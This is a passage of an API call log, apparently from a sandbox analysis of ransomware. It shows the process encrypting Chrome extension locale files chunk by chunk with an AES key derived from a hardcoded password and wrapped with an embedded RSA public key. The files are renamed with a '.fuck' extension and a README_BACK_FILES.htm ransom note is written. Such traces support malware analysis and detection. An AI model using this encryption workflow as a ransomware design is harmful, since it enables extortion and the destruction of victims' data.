lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.322] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.322] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.323] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.323] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.324] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.324] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.324] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.324] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.324] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.324] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.325] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.325] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.325] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.325] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.325] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.325] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.325] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1a3, lpOverlapped=0x0) returned 1 [0263.325] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1a3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1b0) returned 1 [0263.325] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1b0, lpOverlapped=0x0) returned 1 [0263.325] CloseHandle (hObject=0x5d60) returned 1 [0263.325] CloseHandle (hObject=0x5d5c) returned 1 [0263.326] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), bFailIfExists=0) returned 1 [0263.331] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json", dwFileAttributes=0x0) returned 1 [0263.331] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.gsg")) returned 1 [0263.332] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.fuck")) returned 1 [0263.334] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.334] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.334] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.334] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.334] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.334] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\readme_back_files.htm")) returned 0xffffffff [0263.334] AreFileApisANSI () returned 1 [0263.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.334] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.335] GetFileType (hFile=0x5d64) returned 0x1 [0263.335] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.336] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.336] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.336] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.336] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.336] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.336] GetLastError () returned 0x0 [0263.336] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json")) returned 0x20 [0263.337] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0263.337] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.338] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.339] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.341] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.341] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.341] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.341] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.341] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.341] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.341] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e75908) returned 1 [0263.342] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75908, dwCertEncodingType=0x1, pInfo=0x2ead900*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead930*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead938*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e680) returned 1 [0263.342] CryptEncrypt (in: hKey=0x2e7e680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.342] CryptEncrypt (in: hKey=0x2e7e680, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e754c8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e754c8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.342] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e754c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e754c8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.343] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.352] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.352] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.363] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.363] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.363] 